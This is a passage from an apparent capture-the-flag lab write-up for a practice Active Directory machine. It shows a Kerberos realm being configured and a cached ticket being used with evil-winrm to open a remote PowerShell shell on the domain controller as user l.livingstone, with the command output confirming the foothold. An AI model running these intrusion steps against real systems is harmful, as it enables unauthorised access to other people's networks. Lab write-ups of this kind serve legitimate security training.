l.livingstone
The credential of the l.livingstone user has been validated.
The user can connect to the target system over both WinRM and RDP.
WinRM
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ echo -e '[realms]\n\n\tRESOURCED.LOCAL = {\n\t\tkdc = ResourceDC.resourced.local\n\t}' | sudo tee /etc/krb5.conf
[realms]
RESOURCED.LOCAL = {
kdc = ResourceDC.resourced.local
}
Setting up the /etc/krb5.conf file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache evil-winrm -i ResourceDC.resourced.local -r RESOURCED.LOCAL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami
resourced\l.livingstone
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> hostname
ResourceDC
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.169.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.169.254
Initial foothold established on the target system as the l.livingstone user via WinRM.